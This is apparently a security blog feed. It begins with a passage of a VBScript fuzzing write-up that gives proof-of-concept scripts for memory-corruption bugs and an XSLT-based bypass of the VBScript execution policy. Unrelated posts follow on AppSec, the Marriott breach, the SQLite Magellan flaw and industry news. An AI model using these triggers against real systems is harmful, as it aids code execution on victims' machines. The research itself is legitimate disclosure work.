  3. Assignment causes a callback in which the container storage is freed
  4. The assignment then writes to freed memory

The two differences between these two samples are that:
  1. In the first case, the container used was an array and in the second it was a dictionary
  2. In the first case, the callback used was a default property getter, and in the second case, the callback was Class_Terminate.

Perhaps it was because of this similarity to a publicly known sample that this variant was also independently discovered by a researcher working with Trend Micro's Zero Day Initiative and by Yuki Chen of the Qihoo 360 Vulcan Team. Given this similarity, it would not be surprising if the author of the 0day used in the wild also knew about this variant.

The second bug we found wasn’t directly related to any 0days found in the wild (that we know of), but it is a classic example of a scripting engine vulnerability:

Class class1
 Public Default Property Get x
   ReDim arr(1)
 End Property
End Class

set c = new class1
arr = Array("b", "b", "a", "a", c)
Call Filter(arr, "a")

In it, a Filter function gets called on an array. The Filter function walks the array and returns another array containing just the elements that match the specified substring ("a" in this case). Because one of the members of the input array is an object with a default property getter, this causes a callback, and in the callback the input array is resized. This results in reading variables out-of-bounds once we return from the callback into the implementation of the Filter function.

A possible reason why this bug survived this long could be that the implementation of the Filter function tried to prevent bugs like this by checking, at every iteration of the algorithm, whether the array size is larger than (or equal to) the number of matching objects. However, this check fails to account for array members that do not match the given substring (such as the elements with the value "b" in the PoC).
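The insufficient check can be modeled in Python (a loose analogue only: the real bug is a memory-safety issue in the engine's native implementation, and all names here are hypothetical). The non-matching "b" elements pad the array length so the length-versus-matches comparison still passes after the mid-iteration shrink:

```python
class Getter:
    """Models a VBScript default property getter that resizes
    (ReDims) the array while Filter is iterating over it."""
    def __init__(self, value, backing):
        self.value, self.backing = value, backing

    def get(self):
        del self.backing[2:]   # shrink the array to two elements
        return self.value

def flawed_filter(arr, substr):
    """Hypothetical model of the buggy logic: the array length is
    compared against the number of *matches* kept so far, which
    ignores non-matching elements."""
    out = []
    for i in range(len(arr)):        # iteration bound captured up front
        if len(arr) < len(out):      # the insufficient safety check
            raise RuntimeError("shrink detected")
        elem = arr[i]                # in the real engine this read can
                                     # land in freed memory
        value = elem.get() if isinstance(elem, Getter) else elem
        if substr in value:
            out.append(value)
    return out

arr = ["b", "b", "a"]
arr.append(Getter("a", arr))         # callback fires during iteration
arr.append("a")
try:
    flawed_filter(arr, "a")
except IndexError:
    print("read past the shrunken array")
```

After the getter shrinks the array to two elements, the check compares length 2 against 2 matches and passes, and the next read goes out of bounds; Python raises IndexError where the native code would read freed memory.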

In their advisory, Microsoft initially classified the impact of this issue, incorrectly, as an infoleak. While the bug results in an out-of-bounds read, what is read out of bounds (and subsequently returned to the user) is a VBScript variable. If attacker-controlled data is interpreted as a VBScript variable, this can result in a lot more than an infoleak and can easily be converted into code execution. This issue is a good example of why, in general, an out-of-bounds read can be more than an infoleak: it always depends on precisely what kind of data is read and how it is used.

The third bug we found is interesting because it is in the code that was already heavily worked on in order to address CVE-2018-8174 and the variants found by the Qihoo 360 Vulcan Team. In fact, it is possible that the bug we found was introduced when fixing one of the previous issues.

We initially became aware of the problem when the fuzzer generated a sample that resulted in a NULL-pointer dereference with the following (minimized) PoC:

Dim a, r

Class class1
End Class

Class class2
 Private Sub Class_Terminate()
   set a = New class1
 End Sub
End Class

a = Array(0)
set a(0) = new class2
Erase a
set r = New RegExp
x = r.Replace("a", a)

Why does this result in a NULL-pointer dereference? This is what happens:
  1. An array a is created. At this point, the type of a is an array.
  2. An object of type class2 is set as the only member of the array
  3. The array a is deleted using the Erase function. This also clears all array elements.
  4. Since class2 defines a custom destructor, it gets called during Erase function call.
  5. In the callback, we change the value of a to an object of type class1. The type of a is now an object.
  6. Before Erase returns, it sets the value of variable a to NULL. Now, a is a variable with the type object and the value NULL.
  7. In some cases, when a gets used, this leads to a NULL-pointer dereference.

But can this scenario be used for more than a NULL-pointer dereference? To answer this question, let’s look at step 5. In it, the value of a is set to an object of type class1. This assignment necessarily increases the reference count of the class1 object. Later, however, the value of a is set to NULL without decrementing the reference count. When the PoC above finishes executing, there will be an object of type class1 somewhere in memory with a reference count of 1, but no variable actually pointing to it. This is a reference leak. For example, consider the following PoC:

Dim a, c, i

Class class1
End Class

Class class2
 Private Sub Class_Terminate()
   set a = c
 End Sub
End Class

Set c = New class1
For i = 1 To 1000
 a = Array(0)
 set a(0) = new class2
 Erase a
Next

Using the principle described above, the PoC will increase the reference count of the object c points to by 1000, when in reality only a single variable holds a reference to it. Since a reference count in VBScript is a 32-bit integer, if we increase it a sufficient number of times it will overflow, and the object might get freed while there are still references to it.

The above is not exactly true: custom classes in VBScript have protection against reference count overflows, but built-in classes such as RegExp do not. So we can simply use an object of type RegExp instead of class1, and the reference count will eventually overflow. Because every reference count increase requires a callback, “eventually” could mean several hours, so the only realistic exploitation scenario is someone opening a tab or window and forgetting to close it—not really an APT-style attack (unlike the previous bugs discussed), but still a good example of how the design of VBScript makes object lifetime issues very difficult to fix.

Hunting for reference leaks

In an attempt to find more reference leak issues, we made a simple modification to the fuzzer: a counter was added, and every time a custom object was created, its class constructor increased the counter. Similarly, every time an object was deleted, its class destructor decreased the counter. If the counter is larger than 0 after a sample finishes executing and all variables are cleared, there was a reference leak somewhere.
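The same bookkeeping can be sketched in Python, with a class standing in for the fuzzer-generated VBScript classes (names and structure here are illustrative, not the actual fuzzer code):

```python
import gc

live_objects = 0   # global counter shared by all generated classes

class Tracked:
    """Stand-in for a fuzzer-generated class whose constructor and
    destructor maintain the global live-object counter."""
    def __init__(self):
        global live_objects
        live_objects += 1      # Class_Initialize analogue

    def __del__(self):
        global live_objects
        live_objects -= 1      # Class_Terminate analogue

def leaks_after(sample):
    """Run one generated sample; a nonzero counter afterwards means
    something was created but never destroyed."""
    sample()
    gc.collect()               # flush any pending finalizers
    return live_objects

# A well-behaved sample: everything it creates goes out of scope.
print(leaks_after(lambda: [Tracked() for _ in range(10)]))  # 0

# A leaking sample: a lingering reference keeps one object alive.
stash = []
print(leaks_after(lambda: stash.append(Tracked())))         # 1
```

The harness only detects that the count is off, not where the extra reference is held, which is exactly the limitation discussed below.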

This approach immediately resulted in a variant of the previously described reference leak, almost identical but using ReDim instead of Erase. Microsoft responded that they consider it a duplicate of the Erase issue.

Unfortunately, there is a problem with this approach that prevents it from discovering more interesting reference leak issues: it can’t distinguish “pure” reference leaks from reference leaks that are also memory leaks, which don’t necessarily have the same security impact. One example of an issue this approach gets stuck on is circular references (imagine object A holding a reference to object B and object B holding a reference to object A). However, we still believe that finding reference leaks can be automated, as described later in this blog post.

Bypassing VBScript execution policy

As mentioned in the introduction, in Windows 10 Fall Creators Update, Microsoft disabled VBScript execution in Internet Explorer in the Internet Zone and the Restricted Sites Zone by default. This is certainly a step in the right direction. However, let’s also examine the weaknesses in this approach and its implementation.

Firstly, note that, by default, this policy applies only to the Internet Zone and the Restricted Sites Zone. If a script runs (or an attacker can make it run) in the Local Intranet Zone or the Trusted Sites Zone, the policy simply does not apply. Presumably this is meant to strike a balance between security for home users and the needs of businesses that still rely on VBScript on their intranets. However, it is debatable whether leaving potential gaps in end-user security so that (behind-the-times) businesses do not have to change a default setting strikes the right balance. In the future, we would prefer to see VBScript completely disabled by default in the Internet Explorer engine.

Secondly, when implementing this policy, Microsoft overlooked some places where VBScript code can be executed in Internet Explorer. Specifically, Internet Explorer supports the MSXML object, which has the ability to run VBScript code in XSL Transformations, as in the code below.

<?xml version='1.0'?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:user="http://mycompany.com/mynamespace">

<msxsl:script language="vbscript" implements-prefix="user">
Function xml(str)
          a = Array("Hello", "from", "VBscript")
          xml = Join(a)
End Function
</msxsl:script>

<xsl:template match="/">
  <xsl:value-of select="user:xml(.)"/>
</xsl:template>

</xsl:stylesheet>

Microsoft did not disable VBScript execution for MSXML, even for websites running in the Internet Zone. This issue was reported to Microsoft and was fixed by the time this blog post was published.

You might think that all of these issues are avoidable if Internet Explorer isn’t used for web browsing, but unfortunately the problem with VBScript (and IE in general) runs deeper than that. Most Windows applications that render web content do so using the Internet Explorer engine, as is the case with Microsoft Office, which was used in the recent 0days. It should be said that, earlier this year, Microsoft disabled VBScript execution in Microsoft Office (at least in the most recent version), so this popular vector has been blocked. However, there are other applications, including third-party ones, that also use the IE engine to render web content.

Future research ideas

During this research, some ideas came up that we didn’t get around to implementing. Rather than sitting on them, we list them here in case a reader looking for a light research project wants to pick one up:

  • Combine VBScript fuzzer with the JScript fuzzer in a way that allows VBScript to access JScript objects/functions and vice-versa. Perhaps issues can be found in the interaction of these two engines. Possibly callbacks from one engine (e.g. default property getter from VBScript) can be triggered in unexpected places in the other engine.

  • Create a better tool for finding reference leaks. This could be accomplished by running IE in the debugger and setting breakpoints on object creation/deletion to track addresses of live objects. Afterwards, memory could be scanned similarly to how it was done here to find if there are any objects alive (with reference count >0) that are not actually referenced from anywhere else in the memory (note: Page Heap should be used to ensure there are no stale references from freed memory).

  • Other objects. During the previous year, a number of bugs were found that rely on the Scripting.Dictionary object. Scripting.Dictionary is not one of the built-in VBScript objects; rather, it needs to be instantiated using the CreateObject function. Are there any other objects available from VBScript that would be interesting to fuzz?


VBScript is a scripting engine from a time when many of today’s security considerations weren’t at the forefront of anyone’s thoughts. Because of this, it shouldn’t be surprising that it is a crowd favorite when it comes to attacking Windows systems. And although it has received a lot of attention from the security community recently, new vulnerabilities are still straightforward to find.

Microsoft has taken some good attack-surface-reduction steps recently. However, in combination with an execution policy bypass and the various applications that rely on the Internet Explorer engine to render web content, these bugs could still endanger even users following best practices on up-to-date systems. We hope that, in the future, Microsoft will take further steps to more comprehensively remove VBScript from all security-relevant contexts.

Why the US South Needs You to Send More $50 Grant Bills

The Washington Post has a well researched and written story about why the US Republican party is defined by their racism. Oh, maybe I should say spoiler alert: …slavery’s enduring legacy is evident not only in statistics on black poverty and education. The institution continues to influence how white Southerners think and feel about race … Continue reading Why the US South Needs You to Send More $50 Grant Bills

Acunetix Vulnerability Scanner For Linux Now Available

Acunetix Vulnerability Scanner for Linux is now available: all of the functionality of Acunetix, with all of the dependability of Linux.

Following extensive customer research, it became clear to us that a number of customers and security community professionals preferred to run on Linux. Tech professionals have long chosen Linux for their servers and computers due to its robust security. However, in recent years, this open source operating system has become much more user-friendly.

Read the rest of Acunetix Vulnerability Scanner For Linux Now Available now! Only available at Darknet.

Beyond Scanning: Don’t Let AppSec Ignorance Become Negligence

In recent months, as I’ve worked with more and more prospects and customers, I’ve started to see an interesting trend: as more agile dev teams become responsible for their own security posture, they are relying on the operations team to “plug an AppSec tool” into their CI/CD pipeline to take care of AppSec. While I agree with the sentiment that security needs to be embedded in the build process, I am always surprised that a “tool integrated into a CI/CD pipeline” is as far as the planning typically goes. That said, one of my best mentors told me that consistency should never be a surprise.

When I ask these same teams, “Once you plug a tool into your CI/CD and you get results, what are your next steps?”, I am mostly met with little to no response. Essentially, these teams go from ignorance of their application security state, to knowledge of security-related defects in their code, to security negligence by not acting to address these risky defects.

I have even seen AppSec programs that check all the boxes – they have solid, prioritized app inventories; executive sponsorship; integrations; remediation and mitigation points; policy management; multiple testing techniques; and centralized reporting – yet some agile teams are stepping in and taking a “tool approach” that only focuses on scanning instead. This is not only short-sighted, but also reveals a knowledge gap surrounding what it takes to make an AppSec program successful as security hands the program to individual agile dev teams. When I check in on these security teams, inevitably all the early momentum they leveraged to overcome cultural hurdles and foster a “security is everyone’s responsibility” mentality has come to a halt. This includes the aspirational goals around passing policy and establishing remediation checkpoints. This is not due to development doing the scanning directly (they should do this), but rather to governance of the larger AppSec outcomes fading away. Ops seems more interested in how many scans they can run per day … with no further outcome.

Don’t fall into this trap. You can’t scan your way to secure code. Security teams still need to be a part of the security picture as scanning occurs in the CI/CD pipeline. Here are three key aspects of application security “beyond scanning” that will produce real risk reduction from your efforts:

Secure coding education:

The easiest flaw to fix is the one that is never introduced in the first place. However, most developers don’t have secure coding skills. While it is great to have a scanner built into the CI/CD pipeline, it is just as important now to shift testing “left.” With tools like Veracode’s Greenlight, developers can fix flaws in real time in their IDE while building their applications. In turn, developers learn as they code and reduce the number of flaws introduced over time. In addition, to help drive secure coding education, Veracode provides a number of options for sharing best practices, including instructor-led trainings such as lunch and learns, eLearning on AppSec, and developer workshops on secure coding.

Fixing what you find:

Ultimately, your AppSec program is not effective if you’re not fixing what you find. You can scan every piece of code you write, but without adequate training and guidance, you will not create more secure code. In fact, you will delay developer timelines and still produce vulnerable code. Enabling developers with both a scanning tool and remediation and mitigation guidance is key. At Veracode, we conduct over 5,000 consultation calls a year with development teams, guiding them through fixing flaws they have never had to address before. And we’ve found that after only one to two of these calls, developers’ secure coding know-how improves dramatically.

In addition, your AppSec program also needs to be set up to enable remediation guidance.

For instance, every scan completed should be assessed against a policy — not a policy that changes how you scan or what is discovered, but rather a filter of the results to see if you passed or failed based on the parameters you set for risk tolerance. This policy should also specify how often a team needs to scan, how long they have to fix flaws based on severity/criticality, and which scanning techniques must be used. In addition, you need remediation time built in between scans. Just scanning multiple times a day and pulling results into a tracking system is not useful if no one has the bandwidth to fix anything. You are better off setting a realistic scanning schedule (say, once a day) so developers have time to fix what they find. You can increase scan frequency as you become more secure and are passing policy on a regular basis.
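To make the idea concrete, here is a minimal sketch of such a pass/fail policy filter. All names, severities, and thresholds here are hypothetical illustrations, not any vendor's actual policy format:

```python
from datetime import date

# Hypothetical risk-tolerance parameters set by the security team.
POLICY = {
    "fail_immediately": {"critical"},              # severities that fail on sight
    "fix_sla_days": {"high": 30, "medium": 90},    # days allowed to remediate
    "required_techniques": {"sast", "sca"},        # scan types that must run
}

def evaluate_scan(findings, techniques_used, today=None):
    """Filter scan results against the policy; return (passed, reasons).

    `findings` is a list of dicts like
    {"severity": "high", "first_found": date(...)}.
    The policy never changes what the scanner finds – it only decides
    whether the results fall inside the team's risk tolerance.
    """
    today = today or date.today()
    reasons = []

    missing = POLICY["required_techniques"] - set(techniques_used)
    if missing:
        reasons.append(f"missing scan techniques: {sorted(missing)}")

    for f in findings:
        sev = f["severity"]
        if sev in POLICY["fail_immediately"]:
            reasons.append(f"{sev} flaw outside risk tolerance")
            continue
        sla = POLICY["fix_sla_days"].get(sev)
        if sla is not None and (today - f["first_found"]).days > sla:
            reasons.append(f"{sev} flaw past its {sla}-day fix SLA")

    return (len(reasons) == 0, reasons)
```

Note how the SLA check builds remediation time directly into the policy: a high-severity flaw found yesterday does not fail the build, but the same flaw ignored for a month does.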

Engaging outside expertise:

Can your security team help your development teams fix all the flaws their scans are finding? If you have multiple development teams working in different environments, this can be a nearly impossible task for one central security team. In addition, developers are naturally curious, so just giving them scan results without explaining the underlying technology finding the flaws will lead to push back.

Considering the skills shortage, engaging outside AppSec expertise goes a long way, both to establish your program’s goals and roadmap and keep it on track, and to guide you through fixing the flaws you find. We aren’t suggesting you replace your security team with consultants, but rather that you complement it with specialized AppSec expertise.

We’ve seen the difference this support makes: Veracode customers who work with our Security Program Managers grow their application coverage by 25 percent each year, decrease their time to deployment, and demonstrate better vulnerability detection and remediation metrics. In addition, Veracode has a fully staffed Advanced Integration Team. They work with global companies to help build out scanning in complex CI/CD environments that can vary by teams and regions. It is rare we see a one-and-done simple set-up that enables a full organization. Ultimately, our experienced Security Program Managers help you define the goals of your program, onboard and answer questions about Veracode products, and work with your teams to ensure that your program stays on track and continues to mature.

Learn more

Don’t let ignorance become negligence. Get details on what a mature, effective AppSec program looks like in our Everything You Need to Know About Maturing Your AppSec Program guide.

Why other Hotel Chains could Fall Victim to a ‘Marriott-style’ Data Breach

A guest article authored by Bernard Parsons, CEO, Becrypt

Whilst I am sure more details behind the Marriott data breach will slowly come to light over the coming months, there is already plenty to reflect on given the initial disclosures and accompanying hypotheses.

With the prospects of regulatory fines and lawsuits looming, assimilating the sheer magnitude of the numbers involved is naturally alarming. A figure of up to 500 million records containing personal and potentially financial information is quite staggering. In the eyes of the Information Commissioner’s Office (ICO), this is deemed a ‘Mega Breach’, even though it falls short of the Yahoo data breach. But equally concerning are the various timeframes reported.

Marriott said the breach involved unauthorised access to a database containing Starwood properties guest information, on or before 10th September 2018. Its ongoing investigation suggests the perpetrators had been inside the company’s networks since 2014.

Starwood disclosed its own breach in November 2015 that stretched back to at least November 2014. The intrusion was said to involve malicious software installed on cash registers and other payment systems, which were not part of its guest reservations or membership systems.

The extent of Marriott’s regulatory liabilities will be determined by a number of factors not yet fully in the public domain. For GDPR this will include the date at which the ICO was informed, the processes Marriott has undertaken since discovery, and the extent to which it has followed ‘best practice’ prior to, during and after breach discovery. Despite the magnitude and nature of the breach, it is not impossible to imagine that Marriott followed best practice, albeit such a term is not currently well-defined, and it is fairly easy to imagine that its processes and controls reflect common practice.

A quick internet search reveals just how commonplace and seemingly inevitable the industry’s breaches are. In December 2016, a pattern of fraudulent transactions on credit cards was reportedly linked to use at InterContinental Hotels Group (IHG) properties. IHG stated that the intrusion resulted from malware installed at point-of-sale systems at restaurants and bars of 12 properties in 2016; later, in April 2017, it acknowledged that cash registers at more than 1,000 of its properties were compromised.

According to KrebsOnSecurity, other reported card breaches include Hyatt Hotels (October 2017), the Trump Hotel (July 2017), Kimpton Hotels (September 2016), Mandarin Oriental properties (2015), and Hilton Hotel properties (2015).

Perhaps, therefore, the most important lessons to be learnt in response to such breaches are those that seek to understand the factors that make data breaches all but inevitable today. Whilst it is Marriott in the news this week, the challenges we collectively face are systemic, and it could very easily be another hotel chain next week.

Reflecting on the role of payment (EPOS) systems and cash registers within leisure industry breaches is illustrative of the challenge. Paste the phrase ‘EPOS software’ into your favourite search engine, and see how prominent, or indeed absent, the notion of security is. Is it any wonder that organisations often unwittingly connect devices with common, often unmanaged, vulnerabilities to systems that may at the same time be used to process sensitive data? Many EPOS systems effectively run general-purpose operating systems, but are typically subject to fewer controls and less monitoring than conventional IT systems.

So Why is This?
Often the organisation can’t justify having a full-blown operating system and sophisticated defence tools on these systems, especially when it has a large number of them deployed in the field, accessing bespoke or online applications. Often they are in widely geographically dispersed locations, which means there are significant costs to go out and update, maintain, manage and fix them.

Likewise, organisations don’t always have the local IT resource in many of these locations to maintain the equipment and its security themselves.

Whilst a light is currently being shone on Marriott, perhaps our concerns should be far broader. If the issues are systemic, we need to think about how better security is built into the systems and supply chains we use by default, rather than expecting hotels or similar organisations in other industries to be sufficiently expert. Is it the hotel, as the end user that should be in the headlines, or how standards, expectations and regulations apply to the ecosystem that surrounds the leisure and other industries? Or should the focus be on how this needs to be improved in order to allow businesses to focus on what they do best, without being quite such easy prey?

CEO and co-founder of Becrypt

McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats

The McAfee Advanced Threat Research team today published the McAfee® Labs Threats Report, December 2018. In this edition, we highlight the notable investigative research and trends in threats statistics and observations gathered by the McAfee Advanced Threat Research and McAfee Labs teams in Q3 of 2018.

We are very excited to present to you new insights and a new format in this report. We are dedicated to listening to our customers to determine what you find important and how we can add value. In recent months we have gathered more threat intelligence, correlating and analyzing data to provide more useful insights into what is happening in the evolving threat landscape. McAfee is collaborating closely with MITRE Corporation in extending the techniques of its MITRE ATT&CK™ knowledge base, and we now include the model in our report. We are always working to refine our process and reports. You can expect more from us, and we welcome your feedback.

As we dissect the threat landscape for Q3, some noticeable statistics jump out of the report. In particular, the continued rise of cryptojacking, which has surged unexpectedly over the course of the year. In Q3 the growth of coin miner malware returned to unprecedented levels after a temporary slowdown in Q2.

Our analysis of recent threats included one notable introduction in a disturbing category. In Q3 we saw two new exploit kits: Fallout and Underminer. Fallout almost certainly had a bearing on the spread of GandCrab, the leading ransomware. Five years ago we published the report “Cybercrime Exposed,” which detailed the rise of cybercrime as a service. Exploit kits are the epitome of this economy, affording anyone the opportunity to easily and cheaply enter the digital crime business.

New malware samples jumped up again in Q3 after a decline during the last two quarters. Although the upward trend applies to almost every category, we did measure a decline in new mobile malware samples following three quarters of continual growth.

This post is only a small snapshot of the comprehensive analysis provided in the December Threats Report. We hope you enjoy the new format, and we welcome your feedback.

The post McAfee Labs Threats Report Examines Cybercriminal Underground, IoT Malware, Other Threats appeared first on McAfee Blogs.

Personality May Determine Employee Engagement

Interesting insights from HBR, like how emphasizing positive personalities in the workforce can harm leadership feedback loops: if leaders turn employee optimism and resilience into a key hiring criterion, then it becomes much harder to spot and fix leadership or cultural issues using employee feedback signals. And then they double-down on this assessment of overly …

Mobile Application Security Assessments: The Best Practices to Launch and Maintain a Secure App

Are you considering a mobile app security assessment? Discover the top 5 ways apps are compromised and the main types of testing and best practices moving forward.



SQLite Vulnerability May Be Putting Your Applications at Risk

Late last week, Tencent announced that researchers from its Blade Team had discovered a remote code execution (RCE) vulnerability in SQLite, dubbed Magellan. SQLite is a very popular embedded SQL database engine. It is one of the components inside many thousands of applications, including the Google Chromium browser. Google has since updated Chromium to contain the fixed version of SQLite, version 3.26.0, released on December 1. Although there are no reports of the vulnerability being exploited in the wild, a situation where a high-impact vulnerability is found in a component in widespread use is usually a cause for alarm. This case, however, has some mitigating circumstances that will keep it from becoming another Heartbleed-size problem.

As discussed in previous posts, when we look at vulnerabilities in open source components, we need to distinguish between a component that contains a vulnerability and how that component is used by an application. Every development team that embeds SQLite needs to be doing this right now. It turns out that for an attacker to exploit this particular vulnerability in an application, they need to be able to manipulate the queries that the application makes to SQLite. Chromium implements Web SQL, which allows an attacker to create a web page that will send SQL commands to the embedded SQLite code – thus making it vulnerable. If your application allows user input to construct SQL queries, then your application is likely vulnerable, too.

There are other situations where your application may be vulnerable. Allowing attackers to construct SQL queries sounds a lot like a SQL injection vulnerability. If your app does have a SQLi vulnerability, you may now have a bigger problem – a far more serious RCE vulnerability – if you’re using an outdated version of SQLite. If you’re using application security testing techniques, including SAST, DAST, and manual penetration testing, and fixing issues found as part of your development process, you may feel confident that your apps don’t have any SQLi vulnerabilities. Whether or not you have an AppSec program in place, the best thing development teams can do is update to the latest version of SQLite.
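To illustrate the distinction between vulnerable and safe usage, the sketch below (using Python's standard sqlite3 module and a made-up `guests` table) contrasts building a query from user input with a parameterized query; only the former gives an attacker the control over the SQL text that an exploit like Magellan requires:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE guests (name TEXT)")
conn.execute("INSERT INTO guests VALUES ('alice')")

user_input = "alice' OR '1'='1"  # attacker-controlled string

# UNSAFE: user input is concatenated into the SQL text, so the attacker
# controls the query SQLite parses.
unsafe_rows = conn.execute(
    "SELECT name FROM guests WHERE name = '%s'" % user_input
).fetchall()

# SAFE: a parameterized query passes the input as data, never as SQL.
safe_rows = conn.execute(
    "SELECT name FROM guests WHERE name = ?", (user_input,)
).fetchall()

print(len(unsafe_rows))  # 1 – the injected OR clause matched every row
print(len(safe_rows))    # 0 – no guest is literally named "alice' OR '1'='1"
```

Parameterizing queries closes the injection path, but it is a mitigation, not a substitute for updating the component itself.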

This is true any time you determine that your application uses a component with a known vulnerability, and updating does not need to be a fire drill. Software composition analysis (SCA) can look at the open source code in your app and tell you if there are known vulnerabilities and if a vulnerable method is being called. Veracode’s SCA product uses control flow analysis to do this quickly, without a manual inspection of the components in use. If you find that your application or applications are not vulnerable, you can wait until there is a convenient time to update the component so that keeping current isn’t disruptive to your development schedule.
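A lightweight version of the check an SCA tool performs can be sketched as a simple comparison of the installed component version against the known fix release (3.26.0 in SQLite's case); real SCA products layer vulnerable-method and control-flow analysis on top of this. The function names below are illustrative, not any product's API:

```python
def parse_version(v):
    """Turn a dotted version string like "3.25.3" into a comparable tuple."""
    return tuple(int(part) for part in v.split("."))

def is_patched(component_version, fixed_in):
    """True if the installed component already contains the fix."""
    return parse_version(component_version) >= fixed_in

# Magellan was fixed in SQLite 3.26.0, released December 1, 2018.
SQLITE_FIX = (3, 26, 0)

for installed in ("3.25.3", "3.26.0"):
    status = "ok" if is_patched(installed, SQLITE_FIX) else "vulnerable"
    print(installed, status)
```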

To learn more about how Veracode can help mitigate your organization’s open source risk, download our whitepaper:

McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention

I am excited to announce that McAfee has been recognized as a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention. I believe this recognition is a testament that our device-to-cloud DLP integration of enterprise products helps our customers stay on top of evolving security needs, with solutions that are simple, flexible, comprehensive and fast, so that they can act decisively and mitigate risks. McAfee takes great pride in being recognized by our customers on Gartner Peer Insights.

In its announcement, Gartner explains, “The Gartner Peer Insights Customers’ Choice is a recognition of vendors in this market by verified end-user professionals, considering both the number of reviews and the overall user ratings.” To ensure fair evaluation, Gartner maintains rigorous criteria for recognizing vendors with a high customer satisfaction rate.

For this distinction, a vendor must have a minimum of 50 published reviews with an average overall rating of 4.2 stars or higher during the sourcing period. McAfee met these criteria for McAfee Data Loss Prevention.

Here are some excerpts from customers that contributed to the distinction:

“McAfee DLP Rocks! Easy to implement, easy to administer, pretty robust”

Security and Privacy Manager in the Services Industry

“Flexible solution. Being able to rapidly deploy additional Discover systems as needed as the company expanded was a huge time saving. Being able to then recover the resources while still being able to complete weekly delta discovery on new files being added or changed saved us tens of thousands of dollars quarterly.”

IT Security Manager in the Finance Industry

“McAfee DLP Endpoint runs smoothly even in limited resource environments and it supports multiple platforms like windows and mac-OS. Covers all major vectors of data leakages such as emails, cloud uploads, web postings and removable media file sharing.”

Knowledge Specialist in the Communication Industry

“McAfee DLP (Host and Network) are integrated and provide a simplified approach to rule development and uniform deployment.”

IT Security Engineer in the Finance Industry

 “Using ePO, it’s easy to deploy and manage the devices with different policies.”

Cyber Security Engineer in the Communication Industry


And those are just a few. You can read more reviews for McAfee Data Loss Prevention on the Gartner site.

On behalf of McAfee, I would like to thank all of our customers who took the time to share their experiences. We are honored to be a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention and we know that it is your valuable feedback that made it possible. To learn more about this distinction, or to read the reviews written about our products by the IT professionals who use them, please visit Gartner Peer Insights’ Customers’ Choice.


  • Gartner Peer Insights’ Customers’ Choice announcement December 17, 2018
The GARTNER PEER INSIGHTS CUSTOMERS’ CHOICE badge is a trademark and service mark of Gartner, Inc., and/or its affiliates, and is used herein with permission. All rights reserved. Gartner Peer Insights Customers’ Choice constitute the subjective opinions of individual end-user reviews, ratings, and data applied against a documented methodology; they neither represent the views of, nor constitute an endorsement by, Gartner or its affiliates.

The post McAfee Named a 2018 Gartner Peer Insights Customers’ Choice for Enterprise Data Loss Prevention appeared first on McAfee Blogs.

The Origin of the Quote "There Are Two Types of Companies"

While listening to a webcast this morning, I heard the speaker mention

There are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.

He credited Cisco CEO John Chambers but didn't provide any source.

That didn't sound right to me. I could think of two possible antecedents, so I did some research. I confirmed my memory and would like to present what I found here.

John Chambers did indeed offer the previous quote, in a January 2015 post for the World Economic Forum titled What does the Internet of Everything mean for security? Unfortunately, neither Mr Chambers nor the person who likely wrote the article for him decided to credit the author of this quote.

Before providing proper credit for this quote, we need to decide what the quote actually says. As noted in this October 2015 article by Frank Johnson titled Are there really only “two kinds of enterprises”?, there are really (at least) two versions of this quote:

A popular meme in the information security industry is, “There are only two types of companies: those that know they’ve been compromised, and those that don’t know.”

And the second is like unto it: “There are only two kinds of companies: those that have been hacked, and those that will be.”

We see that the first is a version of what Mr Chambers said. Let's call that 2-KNOW. The second is different. Let's call that 2-BE.

The first version, 2-KNOW, can be easily traced and credited to Dmitri Alperovitch. He stated this proposition as part of the publicity around his Shady RAT report, written while he worked at McAfee. For example, this 3 August 2011 story by Ars Technica, Operation Shady RAT: five-year hack attack hit 14 countries, quotes Dmitri in the following:

So widespread are the attacks that Dmitri Alperovitch, McAfee Vice President of Threat Research, said that the only companies not at risk are those who have nothing worth taking, and that of the world's biggest firms, there are just two kinds: those that know they've been compromised, and those that still haven't realized they've been compromised.

Dmitri used slightly different language in this popular Vanity Fair article from September 2011, titled Enter the Cyber-Dragon:

Dmitri Alperovitch, who discovered Operation Shady rat, draws a stark lesson: “There are only two types of companies—those that know they’ve been compromised, and those that don’t know. If you have anything that may be valuable to a competitor, you will be targeted, and almost certainly compromised.”

No doubt former FBI Director Mueller read this report (and probably spoke with Dmitri). He delivered a speech at RSA on 1 March 2012 that introduced version 2-BE into the lexicon, plus a little more:

For it is no longer a question of “if,” but “when” and “how often.”

I am convinced that there are only two types of companies: those that have been hacked and those that will be. 

And even they are converging into one category: companies that have been hacked and will be hacked again.  

Here we see Mr Mueller morphing Dmitri's quote, 2-KNOW, into the second, 2-BE. He also introduced a third variant -- "companies that have been hacked and will be hacked again." Let's call this version 2-AGAIN.

The very beginning of Mr Mueller's quote is surely a play on Kevin Mandia's long-term commitment to the inevitability of compromise. However, as far as I could find, Kevin did not use the "two companies" language.

One article that mentions version 2-KNOW and Kevin is this December 2014 Ars Technica article titled “Unprecedented” cyberattack no excuse for Sony breach, pros say. However, the article is merely citing other statements by Kevin along with the aphorism of version 2-KNOW.

Finally, there's a fourth version, introduced by Mr Mueller's successor, James Comey. In a 6 October 2014 story, FBI Director: China Has Hacked Every Big US Company, Mr Comey said:

Speaking to CBS' 60 Minutes, James Comey had the following to say on Chinese hackers: 

There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.

Let's call this last variant 2-CHINA.

To summarize, there are four versions of the "two companies" quote:

  • 2-KNOW, credited to Dmitri Alperovitch in 2011, says "There are only two types of companies—those that know they’ve been compromised, and those that don’t know."
  • 2-BE, credited to Robert Mueller in 2012, says "[T]here are only two types of companies: those that have been hacked and those that will be."
  • 2-AGAIN, credited to Robert Mueller in 2012, says "[There are only two types of companies:] companies that have been hacked and will be hacked again."
  • 2-CHINA, credited to James Comey in 2014, says "There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese."
Now you know!

Giving Your Endpoint the Gift of Security This Holiday Season

